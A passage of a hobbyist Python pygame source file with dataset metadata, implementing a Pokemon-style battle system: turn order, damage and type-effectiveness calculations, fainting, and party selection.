type\r\n\t\tself.stats = stats\r\n\t\tself.attacks = attacks\r\n\t\tself.weakness = weakness\r\n\t\tself.resistance = resistance\r\n\t\tself.immunites = immunites\r\n\r\n\tdef getName(self):\r\n\t\treturn self.name\r\n\r\n\tdef getType(self):\r\n\t\treturn self.type\r\n\r\n\tdef getStats(self):\r\n\t\treturn self.stats\r\n\r\n\tdef getAttacks(self):\r\n\t\treturn self.attacks\r\n\r\n\tdef getWeakness(self):\r\n\t\treturn self.weakness\r\n\r\n\tdef getResistance(self):\r\n\t\treturn self.resistance\r\n\r\n\tdef getImmunites(self):\r\n\t\treturn self.immunites\r\n\r\n\r\nclass Battle:\r\n\tdef __init__(self):\r\n\t\tself.state = 0\r\n\t\tself.poke1 = 0\r\n\t\tself.poke2 = 0\r\n\t\tself.userWin = 0\r\n\t\tself.cpuWin = 0\r\n\t\tself.attack = 0\r\n\t\tself.immune = 0\r\n\t\tself.end = 0\r\n\t\tself.u = 0 # user index number for party pokemon\r\n\t\tself.c = 0 # cpu index number for party pokemon\r\n\t\tself.spd1 = 0\r\n\t\tself.spd2 = 0\r\n\t\tself.cpuHp = 0\r\n\t\tself.userHp = 0\r\n\t\tself.tempcpuHp = 0\r\n\t\tself.tempUserHp = 0\r\n\t\tself.turns = 0\r\n\t\tself.askAttack = 0\r\n\t\tself.cpuFaint = 0\r\n\t\tself.userFaint = 0\r\n\t\tself.start = 1\r\n\r\n\tdef update(self, pkmnParty1, pkmnParty2, disp, key, bbox): # pkmnparty1 is user, pkmnparty2 is cpu\r\n\t\tif self.cpuWin == 0 and self.userWin == 0: # show the pokemon sprites while now one has won\r\n\t\t\tuserPkN = text(str(pkmnParty1[self.u].getName()), 36)\r\n\t\t\tcpuPkN = text(str(pkmnParty2[self.c].getName()), 36)\r\n\t\t\tuserHp = text(\"Hp: \" + str(self.userHp), 36)\r\n\t\t\tcpuHp = text(\"Hp: \" + str(self.cpuHp), 36)\r\n\t\t\tcpuPkmnName2 = pkmnParty2[self.c].getName()\r\n\t\t\tpkmnName2 = pkmnParty1[self.u].getName()\r\n\t\t\tif self.start == 1:\r\n\t\t\t\tchalText = text(\"You are challenged by\", 36)\r\n\t\t\t\tchalText.setPos((0, 600 - 85))\r\n\t\t\t\tdisp.blit(chalText.getText(), chalText.getPos())\r\n\t\t\t\tchalTextMore = text(\"Battle Tower Trainer!\", 36)\r\n\t\t\t\tchalTextMore.setPos((0, 600 - 45))\r\n\t\t\t\tdisp.blit(chalTextMore.getText(), chalTextMore.getPos())\r\n\t\t\t\tpygame.display.flip()\r\n\t\t\t\ttime.sleep(3)\r\n\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\tbatIntroText = text(\"Battle Tower Trainer\", 36)\r\n\t\t\t\tmorebatText = text(\"sent out \" + str(cpuPkmnName2), 36)\r\n\t\t\t\tbatIntroText.setPos((0, 600 - 85))\r\n\t\t\t\tdisp.blit(batIntroText.getText(), batIntroText.getPos())\r\n\t\t\t\tmorebatText.setPos((0, 600 - 45))\r\n\t\t\t\tdisp.blit(morebatText.getText(), morebatText.getPos())\r\n\t\t\t\tpygame.display.flip()\r\n\t\t\t\ttime.sleep(3)\r\n\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\tuserBatText = text(\"You sent out \" + str(pkmnName2), 36)\r\n\t\t\t\tuserBatText.setPos((0, 600 - 85))\r\n\t\t\t\tdisp.blit(userBatText.getText(), userBatText.getPos())\r\n\t\t\t\tpygame.display.flip()\r\n\t\t\t\ttime.sleep(2)\r\n\t\t\t\tself.start = 0\r\n\t\t\tuserPkN.setPos((800 - 200, 400))\r\n\t\t\tcpuPkN.setPos((0, 30))\r\n\t\t\tuserHp.setPos((800 - 200, 450))\r\n\t\t\tcpuHp.setPos((0, 60))\r\n\t\t\tdisp.blit(userPkN.getText(), userPkN.getPos())\r\n\t\t\tdisp.blit(cpuPkN.getText(), cpuPkN.getPos())\r\n\t\t\tdisp.blit(userHp.getText(), userHp.getPos())\r\n\t\t\tdisp.blit(cpuHp.getText(), cpuHp.getPos())\r\n\t\t\tdisp.blit(pkmnParty1[self.u].getSurface(), pkmnParty1[self.u].getPos())\r\n\t\t\tdisp.blit(pkmnParty2[self.c].getSurface(), pkmnParty2[self.c].getPos())\r\n\r\n\r\n\t\tif self.state == 0: # at the beginging of a turn get the speed of each pokemon to determine who goes first\r\n\t\t\tself.spd1 = pkmnParty1[self.u].getStats()[5]\r\n\t\t\tself.spd2 = pkmnParty2[self.c].getStats()[5]\r\n\r\n\r\n\t\t\tif self.spd1 > self.spd2:\r\n\t\t\t\tself.poke1 = 1\r\n\t\t\telse:\r\n\t\t\t\tself.poke2 = 1\r\n\r\n\t\t\tself.state = 1\r\n\r\n\t\tif self.state == 1: # get the Hp stat of each pokemon or if a pokemon dies get the new hp of only that pokemon\r\n\r\n\t\t\tif self.cpuFaint == 1:\r\n\t\t\t\tself.tempcpuHp = pkmnParty2[self.c].getStats()[0] # get Hp of cpu\r\n\t\t\t\t# hp calc\r\n\t\t\t\tself.cpuHp = 2 * self.tempcpuHp * 50\r\n\t\t\t\tself.cpuHp = self.cpuHp / 100\r\n\t\t\t\tself.cpuHp = self.cpuHp + 60\r\n\t\t\t\tself.state = 2\r\n\t\t\t\tself.cpuFaint = 0\r\n\r\n\t\t\telif self.userFaint == 1:\r\n\t\t\t\tself.tempUserHp = pkmnParty1[self.u].getStats()[0] # get Hp of user\r\n\t\t\t\t# hp calc\r\n\t\t\t\tself.userHp = 2 * self.tempUserHp * 50\r\n\t\t\t\tself.userHp = self.userHp / 100\r\n\t\t\t\tself.userHp = self.userHp + 60\r\n\t\t\t\tself.state = 2\r\n\t\t\t\tself.userFaint = 0\r\n\r\n\r\n\t\t\telif self.turns == 0:\r\n\t\t\t\tself.tempcpuHp = pkmnParty2[self.c].getStats()[0] # get Hp of cpu\r\n\t\t\t\t# hp calc\r\n\t\t\t\tself.cpuHp = 2 * self.tempcpuHp * 50\r\n\t\t\t\tself.cpuHp = self.cpuHp / 100\r\n\t\t\t\tself.cpuHp = self.cpuHp + 60\r\n\r\n\t\t\t\tself.tempUserHp = pkmnParty1[self.u].getStats()[0] # get Hp of user\r\n\t\t\t\t# hp calc\r\n\t\t\t\tself.userHp = 2 * self.tempUserHp * 50\r\n\t\t\t\tself.userHp = self.userHp / 100\r\n\t\t\t\tself.userHp = self.userHp + 60\r\n\t\t\t\tself.state = 2\r\n\r\n\t\t\tself.cpuHp = int(self.cpuHp)\r\n\t\t\tself.userHp = int(self.userHp)\r\n\t\tif self.state == 2: # get the input from the user to chose what attack to use\r\n\t\t\tattk1 = pkmnParty1[self.u].getAttacks()[0]\r\n\t\t\tattN1 = text(\"(1) \" + str(attk1), 36)\r\n\t\t\tattN1.setPos((0, 600 - 85))\r\n\t\t\tattk2 = pkmnParty1[self.u].getAttacks()[1]\r\n\t\t\tattN2 = text(\"(2) \" + str(attk2), 36)\r\n\t\t\tattN2.setPos((0, 600 - 45))\r\n\t\t\tdisp.blit(attN1.getText(), attN1.getPos())\r\n\t\t\tdisp.blit(attN2.getText(), attN2.getPos())\r\n\t\t\tself.askAttack = 0\r\n\t\t\tif key[pygame.K_1]:\r\n\t\t\t\tself.askAttack = 1\r\n\t\t\t\tself.turns = 0\r\n\t\t\t\tself.state = 3\r\n\t\t\telif key[pygame.K_2]:\r\n\t\t\t\tself.askAttack = 2\r\n\t\t\t\tself.turns = 0\r\n\t\t\t\tself.state = 3\r\n\t\t\treturn\r\n\r\n\t\tif self.state == 3:\r\n\t\t\tif self.turns == 2: # if a turn has passed and no one fainted go back to state 2 to get attack inputs\r\n\t\t\t\tself.state = 2\r\n\t\t\t\treturn\r\n\r\n\t\t\tif self.poke1 == 1: # users turn\r\n\t\t\t\tpkmnName = pkmnParty1[self.u].getName()\r\n\t\t\t\tpkmnAttkName = pkmnParty1[self.u].getAttacks()[self.askAttack - 1]\r\n\r\n\t\t\t\t# text stuff\r\n\t\t\t\tpkAction = text(str(pkmnName) + \" used \" + str(pkmnAttkName), 36)\r\n\t\t\t\tpkAction.setPos((0, 600 - 45))\r\n\t\t\t\tmonkey = 1\r\n\t\t\t\tif monkey == 1: # make text appear for 3 seconds\r\n\t\t\t\t\tdisp.blit(pkAction.getText(), pkAction.getPos())\r\n\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\tmonkey = 0\r\n\r\n\t\t\t\tattTimer = 1\r\n\t\t\t\tif attTimer == 1: # make attack appear for 3 seconds\r\n\t\t\t\t\tdisp.blit(pkmnParty1[self.u].getAttacks()[self.askAttack - 1].getSurface(), pkmnParty1[self.u].getAttacks()[self.askAttack - 1].getPos())\r\n\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\t\tattTimer = 0\r\n\r\n\t\t\t\ttypeAttack = pkmnParty1[self.u].getAttacks()[self.askAttack - 1].getType() # get the type of attakc (rock, grounnd etc)\r\n\t\t\t\tfor i in range(len(pkmnParty2[self.c].getImmunites())): # check for immunites\r\n\t\t\t\t\tif typeAttack == pkmnParty2[self.c].getImmunites()[i]:\r\n\t\t\t\t\t\timmText = text(\"It does not effect \" + str(pkmnParty2[self.c].getName()), 36)\r\n\t\t\t\t\t\timmText.setPos((0, 600-45))\r\n\t\t\t\t\t\tooga = 1\r\n\t\t\t\t\t\tif ooga == 1:\r\n\t\t\t\t\t\t\tdisp.blit(immText.getText(), immText.getPos())\r\n\t\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\t\tooga = 0\r\n\t\t\t\t\t\tself.immune = 1\r\n\t\t\t\t\t\tself.poke1 = 0\r\n\t\t\t\t\t\tself.poke2 = 1\r\n\t\t\t\t\t\treturn\r\n\r\n\t\t\t\tpokeAccur = random.randint(1, 100) # choose random number\r\n\t\t\t\tif pokeAccur > pkmnParty1[self.u].getAttacks()[self.askAttack - 1].getAccuracy(): # check if move hits based on attack accuracy\r\n\t\t\t\t\tmissText = text(str(pkmnParty2[self.c].getName()) + \" avoided the attack\", 36)\r\n\t\t\t\t\tmissText.setPos((0, 600 - 45))\r\n\t\t\t\t\tbooga = 1\r\n\t\t\t\t\tif booga == 1:\r\n\t\t\t\t\t\tdisp.blit(missText.getText(), missText.getPos())\r\n\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\tbooga = 0\r\n\t\t\t\t\tself.turns +=1\r\n\t\t\t\t\tself.poke1 = 0\r\n\t\t\t\t\tself.poke2 = 1\r\n\t\t\t\t\treturn\r\n\r\n\t\t\t\tattack = pkmnParty1[self.u].getAttacks()[self.askAttack - 1].getDamage() # get damage of chosen attack\r\n\r\n\t\t\t\tattackType = pkmnParty1[self.u].getAttacks()[\r\n\t\t\t\t\tself.askAttack - 1].getAttackType() # check if attack is physical or special\r\n\r\n\t\t\t\tif attackType == 1: # get the appropriate defense based on the attack type\r\n\t\t\t\t\tcpuDef = pkmnParty2[self.c].getStats()[2]\r\n\t\t\t\telse:\r\n\t\t\t\t\tcpuDef = pkmnParty2[self.c].getStats()[4]\r\n\r\n\t\t\t\tif attackType == 1: # get the appropriate attack stat based on teh attack type\r\n\t\t\t\t\tpkmnAttk = pkmnParty1[self.u].getStats()[1]\r\n\t\t\t\telse:\r\n\t\t\t\t\tpkmnAttk = pkmnParty1[self.u].getStats()[3]\r\n\r\n\t\t\t\t#print(\"initial cpu Hp: \" + str(self.cpuHp))\r\n\r\n\t\t\t\t# damage calc\r\n\t\t\t\tdamage = 2 * 50\r\n\t\t\t\tdamage = damage / 5\r\n\t\t\t\tdamage += 2\r\n\t\t\t\tdamage = damage * attack\r\n\t\t\t\tdamage = damage * pkmnAttk\r\n\t\t\t\tdamage = damage / cpuDef\r\n\t\t\t\tdamage = damage / 50\r\n\t\t\t\tdamage += 2\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty1[\r\n\t\t\t\t\t\t\t\t\t self.u].getType())): # checks if attack is STAB (same type attack bonus) and if so multiply attack by 1.5\r\n\t\t\t\t\tif typeAttack == pkmnParty1[self.u].getType()[i]:\r\n\t\t\t\t\t\tdamage = damage * 1.5\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tpass\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty2[self.c].getWeakness())): # checks if attack is super effective\r\n\t\t\t\t\tif typeAttack == pkmnParty2[self.c].getWeakness()[i]:\r\n\t\t\t\t\t\tdamage = damage * 2\r\n\t\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\t\t\tsupText = text(\"Its super effective\", 36)\r\n\t\t\t\t\t\tsupText.setPos((0, 600 - 45))\r\n\t\t\t\t\t\tmonkeyagg = 1\r\n\t\t\t\t\t\tif monkeyagg == 1: # make text appear for 3 seconds\r\n\t\t\t\t\t\t\tdisp.blit(supText.getText(), supText.getPos())\r\n\t\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\t\tmonkeyagg = 0\r\n\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty2[self.c].getResistance())): # checks if attack is not very effective\r\n\t\t\t\t\tif typeAttack == pkmnParty2[self.c].getResistance()[i]:\r\n\t\t\t\t\t\tdamage = damage * 0.5\r\n\t\t\t\t\t\tnotText = text(\"Its not very effective\", 36)\r\n\t\t\t\t\t\tnotText.setPos((0, 600 - 45))\r\n\t\t\t\t\t\tmoremonkey = 1\r\n\t\t\t\t\t\tif moremonkey == 1: # make text appear for 3 seconds\r\n\t\t\t\t\t\t\tdisp.blit(notText.getText(), notText.getPos())\r\n\t\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\t\tmoremonkey = 0\r\n\r\n\t\t\t\tcrit = random.randint(1, 100)\r\n\t\t\t\tif crit > 96: # check for a critical hit (4.16 % chance)\r\n\t\t\t\t\tdamage = damage * 1.5\r\n\t\t\t\t\tcritText = text(\"A critical hit!\", 36)\r\n\t\t\t\t\tcritText.setPos((0, 600 - 45))\r\n\t\t\t\t\tmonkeymoremanmonkey = 1\r\n\t\t\t\t\tif monkeymoremanmonkey == 1: # make text appear for 3 seconds\r\n\t\t\t\t\t\tdisp.blit(critText.getText(), critText.getPos())\r\n\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\tmonkeymoremanmonkey = 0\r\n\r\n\t\t\t\telse:\r\n\t\t\t\t\tpass\r\n\r\n\t\t\t\troll = random.randint(1, 25)\r\n\t\t\t\tdamage = damage - roll\r\n\r\n\t\t\t\tif self.immune == 1:\r\n\t\t\t\t\tdamage = 0\r\n\t\t\t\t\tself.immune = 0\r\n\r\n\t\t\t\t#print(\"damage given: \" + str(damage))\r\n\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\tself.cpuHp = self.cpuHp - damage\r\n\t\t\t\tself.cpuHp = int(self.cpuHp)\r\n\t\t\t\tif self.cpuHp < 0:\r\n\t\t\t\t\tself.cpuHp = 0\r\n\r\n\t\t\t\t\tfaintText = text(str(pkmnParty2[self.c].getName()) + \" fainted\", 36)\r\n\t\t\t\t\tfaintText.setPos((0, 600 - 45))\r\n\t\t\t\t\tmonkeyman = 1\r\n\t\t\t\t\tif monkeyman == 1:\r\n\t\t\t\t\t\tdisp.blit(faintText.getText(), faintText.getPos())\r\n\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\tmonkeyman = 0\r\n\r\n\t\t\t\t\tpkmnParty2.pop(self.c)\r\n\r\n\t\t\t\t\tself.cpuFaint = 1\r\n\t\t\t\t\t#print(\"final cpuHP: \" + str(self.cpuHp))\r\n\t\t\t\t\tif len(pkmnParty2) == 0:\r\n\t\t\t\t\t\tself.userWin = 1\r\n\t\t\t\t\t\tself.poke2 = 0\r\n\t\t\t\t\t\tself.poke1 = 0\r\n\t\t\t\t\t\treturn\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#print(\"mons fainted\")\r\n\t\t\t\t\t\tself.state = 0\r\n\t\t\t\t\t\tself.poke1 = 0\r\n\t\t\t\t\t\tself.poke2 = 1\r\n\t\t\t\t\t\treturn\r\n\r\n\t\t\t\t#print(\"final cpuHP: \" + str(self.cpuHp))\r\n\t\t\t\tself.poke1 = 0\r\n\t\t\t\tself.poke2 = 1\r\n\t\t\t\tself.turns += 1\r\n\t\t\t\treturn\r\n\r\n\r\n\r\n\r\n\r\n\t\t\tif self.poke2 == 1: ### CPUS TURN\r\n\t\t\t\t#print(self.cpuHp)\r\n\t\t\t\tcpuAttacks = pkmnParty2[self.c].getAttacks()\r\n\t\t\t\tcpuAskAttack = cpuAttacks[0]\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty1[self.u].getWeakness())): # cpu checks if it has a super effective attack so it will use it\r\n\t\t\t\t\tfor j in range(len(cpuAttacks)):\r\n\t\t\t\t\t\tif cpuAttacks[j].getType() == pkmnParty1[self.u].getWeakness()[i]:\r\n\t\t\t\t\t\t\tcpuAskAttack = cpuAttacks[j]\r\n\t\t\t\t\t\t\t#print(cpuAskAttack)\r\n\r\n\t\t\t\tcpuTypeAttack = cpuAskAttack.getType()\r\n\t\t\t\tfor i in range(len(pkmnParty1[self.u].getImmunites())): # check for immunites\r\n\t\t\t\t\tif cpuAskAttack.getType() != pkmnParty1[self.u].getImmunites()[i]:\r\n\t\t\t\t\t\tpass\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tcpuAskAttack = cpuAttacks[1]\r\n\t\t\t\t\tif cpuTypeAttack == pkmnParty1[self.u].getImmunites()[i]:\r\n\t\t\t\t\t\timmText = text(\"It does not effect \" + str(pkmnParty1[self.u].getName()), 36)\r\n\t\t\t\t\t\timmText.setPos((0, 600-45))\r\n\t\t\t\t\t\tooga = 1\r\n\t\t\t\t\t\tif ooga == 1:\r\n\t\t\t\t\t\t\tdisp.blit(immText.getText(), immText.getPos())\r\n\t\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\t\tooga = 0\r\n\t\t\t\t\t\tself.immune = 1\r\n\t\t\t\t\t\tself.poke1 = 1\r\n\t\t\t\t\t\tself.poke2 = 0\r\n\t\t\t\t\t\treturn\r\n\r\n\r\n\r\n\r\n\t\t\t\tcpuPkmnName = pkmnParty2[self.c].getName()\r\n\t\t\t\tcpuPkmnAttkName = cpuAskAttack.getName()\r\n\t\t\t\t# text stuff\r\n\t\t\t\tcpuAction = text(str(cpuPkmnName) + \" used \" + str(cpuPkmnAttkName), 36)\r\n\t\t\t\tcpuAction.setPos((0, 600 - 45))\r\n\t\t\t\tcpumonkey = 1\r\n\t\t\t\tif cpumonkey == 1: # make text appear for 3 seconds\r\n\t\t\t\t\tdisp.blit(cpuAction.getText(), cpuAction.getPos())\r\n\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\tcpumonkey = 0\r\n\r\n\t\t\t\tattTimer = 1\r\n\t\t\t\tif attTimer == 1: # make attack appear for 1 seconds\r\n\t\t\t\t\tdisp.blit(cpuAskAttack.getSurface(), cpuAskAttack.getPos())\r\n\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\t\tattTimer = 0\r\n\r\n\t\t\t\tcpuTypeAttack = cpuAskAttack.getType() # get the type of attakc (rock, grounnd etc)\r\n\t\t\t\tcpupokeAccur = random.randint(1, 100) # choose random number\r\n\t\t\t\tif cpupokeAccur > cpuAskAttack.getAccuracy(): # check if move hits based on attack accuracy\r\n\t\t\t\t\tmissText = text(str(pkmnParty1[self.u].getName()) + \" avoided the attack\", 36)\r\n\t\t\t\t\tmissText.setPos((0, 600 - 45))\r\n\t\t\t\t\tbooga = 1\r\n\t\t\t\t\tif booga == 1:\r\n\t\t\t\t\t\tdisp.blit(missText.getText(), missText.getPos())\r\n\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\tbooga = 0\r\n\t\t\t\t\tself.poke1 = 1\r\n\t\t\t\t\tself.poke2 = 0\r\n\t\t\t\t\treturn\r\n\r\n\t\t\t\tcpuAttack = cpuAskAttack.getDamage() # damage of cpu's attack\r\n\r\n\t\t\t\tcpuAttackType = cpuAskAttack.getAttackType() # check if attack is physical or special\r\n\r\n\t\t\t\tif cpuAttackType == 1: # get the appropriate defense based on the attack type\r\n\t\t\t\t\tuserDef = pkmnParty1[self.u].getStats()[2]\r\n\t\t\t\telse:\r\n\t\t\t\t\tuserDef = pkmnParty1[self.u].getStats()[4]\r\n\r\n\t\t\t\tif cpuAttackType == 1: # get the appropriate attack stat based on teh attack type\r\n\t\t\t\t\tcpupkmnAttk = pkmnParty2[self.c].getStats()[1]\r\n\t\t\t\telse:\r\n\t\t\t\t\tcpupkmnAttk = pkmnParty2[self.c].getStats()[3]\r\n\r\n\t\t\t\t#print(\"inital user hp: \" + str(self.userHp))\r\n\r\n\t\t\t\t# damage calc\r\n\t\t\t\tcpuDamage = 2 * 50\r\n\t\t\t\tcpuDamage = cpuDamage / 5\r\n\t\t\t\tcpuDamage += 2\r\n\t\t\t\tcpuDamage = cpuDamage * cpuAttack\r\n\t\t\t\tcpuDamage = cpuDamage * cpupkmnAttk\r\n\t\t\t\tcpuDamage = cpuDamage / userDef\r\n\t\t\t\tcpuDamage = cpuDamage / 50\r\n\t\t\t\tcpuDamage += 2\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty2[self.c].getType())): # checks if attack is STAB (same type attack bonus) and if so multiply attack by 1.5\r\n\t\t\t\t\tif cpuTypeAttack == pkmnParty2[self.c].getType()[i]:\r\n\t\t\t\t\t\tcpuDamage = cpuDamage * 1.5\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tpass\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty1[self.u].getWeakness())): # checks if attack is super effective\r\n\t\t\t\t\tif cpuTypeAttack == pkmnParty1[self.u].getWeakness()[i]:\r\n\t\t\t\t\t\tcpuDamage = cpuDamage * 2\r\n\t\t\t\t\t\tsupText = text(\"Its super effective\", 36)\r\n\t\t\t\t\t\tsupText.setPos((0, 600 - 45))\r\n\t\t\t\t\t\tmonkeyagg = 1\r\n\t\t\t\t\t\tif monkeyagg == 1: # make text appear for 3 seconds\r\n\t\t\t\t\t\t\tdisp.blit(supText.getText(), supText.getPos())\r\n\t\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\t\tmonkeyagg = 0\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty1[self.u].getResistance())): # checks if attack is not very effective\r\n\t\t\t\t\tif cpuTypeAttack == pkmnParty1[self.u].getResistance()[i]:\r\n\t\t\t\t\t\tcpuDamage = cpuDamage * 0.5\r\n\t\t\t\t\t\tnotText = text(\"Its not very effective\", 36)\r\n\t\t\t\t\t\tnotText.setPos((0, 600 - 45))\r\n\t\t\t\t\t\tmoremonkey = 1\r\n\t\t\t\t\t\tif moremonkey == 1: # make text appear for 3 seconds\r\n\t\t\t\t\t\t\tdisp.blit(notText.getText(), notText.getPos())\r\n\t\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\t\tmoremonkey = 0\r\n\r\n\t\t\t\tcpucrit = random.randint(1, 100)\r\n\t\t\t\tif cpucrit > 96: # check for a critical hit (4.16 % chance)\r\n\t\t\t\t\tcpuDamage = cpuDamage * 1.5\r\n\t\t\t\t\tcritText = text(\"A critical hit!\", 36)\r\n\t\t\t\t\tcritText.setPos((0, 600 - 45))\r\n\t\t\t\t\tmonkeymoremanmonkey = 1\r\n\t\t\t\t\tif monkeymoremanmonkey == 1: # make text appear for 3 seconds\r\n\t\t\t\t\t\tdisp.blit(critText.getText(), critText.getPos())\r\n\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\tmonkeymoremanmonkey = 0\r\n\t\t\t\telse:\r\n\t\t\t\t\tpass\r\n\r\n\t\t\t\tif self.immune == 1:\r\n\t\t\t\t\tcpuDamage = 0\r\n\t\t\t\t\tself.immune = 0\r\n\t\t\t\t#print(\"damage given from cpu: \" + str(cpuDamage))\r\n\r\n\t\t\t\tself.userHp = self.userHp - cpuDamage\r\n\t\t\t\tself.userHp = int(self.userHp)\r\n\t\t\t\t#print(\"final user Hp: \" + str(self.userHp))\r\n\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\r\n\r\n\t\t\t\tif self.userHp < 0:\r\n\t\t\t\t\tself.userHp = 0\r\n\t\t\t\t\tfaintText = text(str(pkmnParty1[self.u].getName()) + \" fainted\", 36)\r\n\t\t\t\t\tfaintText.setPos((0, 600 - 45))\r\n\t\t\t\t\tmonkeyman = 1\r\n\t\t\t\t\tif monkeyman == 1:\r\n\t\t\t\t\t\tdisp.blit(faintText.getText(), faintText.getPos())\r\n\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\tmonkeyman = 0\r\n\t\t\t\t\tpkmnParty1.pop(self.u)\r\n\t\t\t\t\t#print(\"monkey faint activated\")\r\n\t\t\t\t\tself.userFaint = 1\r\n\t\t\t\t\t#print(self.userFaint)\r\n\t\t\t\t\t#print(\"final user Hp: \" + str(self.userHp))\r\n\t\t\t\t\tif len(pkmnParty1) == 0:\r\n\t\t\t\t\t\t#print('monkey')\r\n\t\t\t\t\t\tself.poke2 = 0\r\n\t\t\t\t\t\tself.poke1 = 0\r\n\t\t\t\t\t\tself.cpuWin = 1\r\n\t\t\t\t\t\treturn\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#print(\"mons fainted\")\r\n\t\t\t\t\t\tself.state = 0\r\n\t\t\t\t\t\tself.poke1 = 0\r\n\t\t\t\t\t\tself.poke2 = 0\r\n\t\t\t\t\t\tprint(self.state)\r\n\t\t\t\t\t\treturn\r\n\r\n\t\t\t\tself.poke2 = 0\r\n\t\t\t\tself.poke1 = 1\r\n\t\t\t\tself.turns += 1\r\n\t\t\t\treturn\r\n\r\n\t\t\tif self.cpuWin == 1:\r\n\t\t\t\t#print(\"You ded cpu win\")\r\n\t\t\t\tself.end = 2\r\n\r\n\t\t\tif self.userWin == 1:\r\n\t\t\t\t#print(\"you killed pokeman woo yay\")\r\n\t\t\t\tself.end = 1\r\n\r\n\t\treturn self.end\r\n\r\nclass Select: # chose a party of 3 pokemon\r\n\tdef __init__(self):\r\n\t\tself.bp = [False, False, False, False, False, False]\r\n\t\tself.selection = []\r\n\r\n\tdef choseMon(self, key):\r\n\t\tif len(self.selection) == 3:\r\n\t\t\treturn self.selection\r\n\r\n\t\tif key[pygame.K_1] and not self.bp[0]: # makes sure you dont press same button twice\r\n\t\t\tself.bp[0] = True\r\n\t\t\tself.selection.append(0) # add the index of pokemon\r\n\r\n\t\tif key[pygame.K_2] and not self.bp[1]:\r\n\t\t\tself.bp[1] = True\r\n\t\t\tself.selection.append(1)\r\n\r\n\t\tif key[pygame.K_3] and not self.bp[2]:\r\n\t\t\tself.bp[2] = True\r\n\t\t\tself.selection.append(2)\r\n\r\n\t\tif key[pygame.K_4] and not self.bp[3]:\r\n\t\t\tself.bp[3] = True\r\n\t\t\tself.selection.append(3)\r\n\r\n\t\tif key[pygame.K_5] and not self.bp[4]:\r\n\t\t\tself.bp[4] = True\r\n\t\t\tself.selection.append(4)\r\n\r\n\t\tif key[pygame.K_6] and not self.bp[5]:\r\n\t\t\tself.bp[5] = True\r\n\t\t\tself.selection.append(5)\r\n\r\n\t\treturn [0]", "repo_name": "Nikhil6767/Games", "sub_path": "Pokemon_Project/Classes.py", "file_name": "Classes.py", "file_ext": "py", "file_size_in_byte": 22249, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pygame.Surface", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.SRCALPHA", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.SRCALPHA", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.image.load", 